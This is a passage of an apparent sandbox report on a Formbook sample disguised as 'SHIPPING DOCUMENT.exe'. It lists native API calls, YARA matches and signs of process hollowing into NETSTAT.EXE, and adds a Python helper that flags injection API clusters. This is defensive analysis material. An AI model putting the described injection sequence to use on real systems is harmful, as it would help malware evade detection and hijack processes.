          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B099A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B095D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B096E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B097A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B098A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09820 NtEnumerateKey
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B0B040 NtSuspendThread
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B099D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09950 NtQueueApcThread
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09A10 NtQuerySection
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B0A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09B00 NtSetValueKey
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B095F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B0AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09560 NtWriteFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B096D0 NtCreateKey
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09650 NtQueryValueKey
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B0A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09770 NtSetInformationFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B0A770 NtOpenThread
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B09760 NtOpenProcess
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_1_00419D60 NtCreateFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_1_00419E10 NtReadFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_1_00419E90 NtClose
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_1_00419F40 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039096D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039096E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039099A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039095D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0390A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039097A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0390A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0390A770 NtOpenThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909760 NtOpenProcess
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909A10 NtQuerySection
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909A20 NtResumeThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039099D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039095F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0390AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909560 NtWriteFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039098A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039098F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03909820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0390B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DD9E90 NtClose
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DD9E10 NtReadFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DD9F40 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DD9D60 NtCreateFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DD9E8A NtClose
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DD9E0A NtReadFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DD9F3A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DD9D5A NtCreateFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 0_2_00403461 EntryPoint, SetErrorMode, GetVersion, lstrlenA, #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, OleUninitialize, ExitProcess, lstrcatA, lstrcatA, lstrcatA, lstrcmpiA, SetCurrentDirectoryA, DeleteFileA, CopyFileA, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 0_2_00406925
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041E1FC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041D260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041DA2A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041BDC4
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00409E40
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041D6DF
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_0041DFA3
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B920A8
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ADB090
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B81002
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AE4120
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ACF900
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B922AE
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AFEBB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B8DBD2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B92B28
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AD841F
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AF2581
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00ADD5E0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AC0D20
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B92D07
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B91D55
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B92EF7
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00AE6E30
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_2_00B91FF1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_1_0041E1FC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_1_0041D260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: 1_1_0041DA2A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_038FEBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0398DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03991FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03992B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039922AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03992EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_038E6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_038F2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_038DD5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_038CF900
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03992D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_038C0D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_038E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03991D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_038DB090
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_039920A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_038D841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_03981002
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DDE1FC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DC9E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DC9E3C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DC2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DDDFA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DDBDC4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02DC2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 038CB150 appears 35 times
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: String function: 00ACB150 appears 35 times
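The native-call listing above is the raw evidence behind the report's process-hollowing and APC-injection verdicts: the same cluster of NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread and NtQueueApcThread appears in both the unpacked sample (process 1) and the injected NETSTAT.EXE (process 8), while the NSIS stage (process 0) references none of them. The Python below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it parses "Code function" rows in the layout this page uses, groups the referenced APIs by process, and reports which injection clusters each process completes. The cluster definitions are my own heuristics, not Joe Sandbox's signature logic; the sample rows are a constructed subset of the page's rows in the raw form the sandbox emits them, and the parser accepts rows with or without the trailing repeated function identifier.

```python
"""Group Joe Sandbox "Code function" rows by process and flag injection API clusters.

Added triage helper; not part of the sandbox report or the analysed sample.
"""
import re
from collections import defaultdict

EXE = r"Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe Code function: "
NET = r"Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: "

# Constructed subset of the report's rows, kept in the raw layout the sandbox emits:
# <pid>_<run>_<addr> <api>,<api>,...,<pid>_<run>_<addr> (identifier repeated as link cell).
SAMPLE_LINES = [
    EXE + "0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,"
          "SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,"
          "GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,"
          "SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,"
          "ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,"
          "CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,"
          "AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461",
    EXE + "1_2_00B099A0 NtCreateSection,LdrInitializeThunk,1_2_00B099A0",
    EXE + "1_2_00B09780 NtMapViewOfSection,LdrInitializeThunk,1_2_00B09780",
    EXE + "1_2_00B097A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00B097A0",
    EXE + "1_2_00B098A0 NtWriteVirtualMemory,1_2_00B098A0",
    EXE + "1_2_00B0B040 NtSuspendThread,1_2_00B0B040",
    EXE + "1_2_00B0A3B0 NtGetContextThread,1_2_00B0A3B0",
    EXE + "1_2_00B0AD30 NtSetContextThread,1_2_00B0AD30",
    EXE + "1_2_00B09A20 NtResumeThread,LdrInitializeThunk,1_2_00B09A20",
    EXE + "1_2_00B09950 NtQueueApcThread,1_2_00B09950",
    EXE + "1_2_00B099D0 NtCreateProcessEx,1_2_00B099D0",
    EXE + "1_2_004010301_2_00401030",          # row without an API list, as fused on the page
    EXE + "1_1_00419D60 NtCreateFile,1_1_00419D60",
    NET + "8_2_039099A0 NtCreateSection,LdrInitializeThunk,8_2_039099A0",
    NET + "8_2_03909780 NtMapViewOfSection,LdrInitializeThunk,8_2_03909780",
    NET + "8_2_039097A0 NtUnmapViewOfSection,8_2_039097A0",
    NET + "8_2_039098A0 NtWriteVirtualMemory,8_2_039098A0",
    NET + "8_2_0390B040 NtSuspendThread,8_2_0390B040",
    NET + "8_2_0390A3B0 NtGetContextThread,8_2_0390A3B0",
    NET + "8_2_0390AD30 NtSetContextThread,8_2_0390AD30",
    NET + "8_2_03909A20 NtResumeThread,8_2_03909A20",
    NET + "8_2_03909950 NtQueueApcThread,8_2_03909950",
    NET + "8_2_02DD9D60 NtCreateFile,8_2_02DD9D60",
]

# Row layout as rendered on the page. "Source" may run straight into "Code function" (fused
# extraction) and the trailing repeated identifier is optional, so cleaned rows parse too.
ROW = re.compile(
    r"Source:\s*(?P<source>.+?)\s*Code function:\s*"
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s*"
    r"(?P<apis>[A-Za-z0-9_#,]*?)"
    r"(?:\s*,?\s*(?P=pid)_(?P=run)_(?P=addr))?\s*$"
)

# Assumed clusters (my triage heuristics, not the sandbox's signatures). A cluster counts only
# when every listed native call is referenced somewhere in the same process.
INJECTION_PATTERNS = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "section mapping injection": {"NtCreateSection", "NtMapViewOfSection", "NtResumeThread"},
    "APC injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    "thread context hijack": {"NtSuspendThread", "NtGetContextThread",
                              "NtSetContextThread", "NtResumeThread"},
}


def parse_rows(lines):
    """Return (pid, image name, function address, [apis]) for each row matching the layout."""
    rows = []
    for line in lines:
        m = ROW.match(line.strip())
        if not m:
            continue
        apis = [a for a in m["apis"].split(",") if a]
        image = m["source"].rsplit("\\", 1)[-1]
        rows.append((int(m["pid"]), image, int(m["addr"], 16), apis))
    return rows


def apis_by_process(rows):
    """Union of referenced APIs per (pid, image); runs of the same process are merged."""
    acc = defaultdict(set)
    for pid, image, _addr, apis in rows:
        acc[(pid, image)].update(apis)
    return acc


def injection_findings(lines):
    """Map (pid, image) to its Nt* calls and the injection clusters those calls complete."""
    findings = {}
    for key, apis in sorted(apis_by_process(parse_rows(lines)).items()):
        findings[key] = {
            "native_apis": sorted(a for a in apis if a.startswith("Nt")),
            "injection": [label for label, needed in INJECTION_PATTERNS.items()
                          if needed <= apis],
        }
    return findings


if __name__ == "__main__":
    for (pid, image), info in injection_findings(SAMPLE_LINES).items():
        print(f"pid {pid} {image}: {len(info['native_apis'])} Nt* calls; "
              f"injection clusters: {info['injection'] or 'none'}")
```

Run against a full report export, the same grouping separates the installer stage from the unpacked payload and shows that the payload reproduced its complete injection toolkit inside the hijacked system binary, which is the pattern a detection engineer should look for when hunting for Formbook-style hollowing rather than any single API.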
          Source: SHIPPING DOCUMENT.exe, 00000000.00000003.653383612.000000000338F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe, 00000001.00000002.700777505.0000000000D4F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY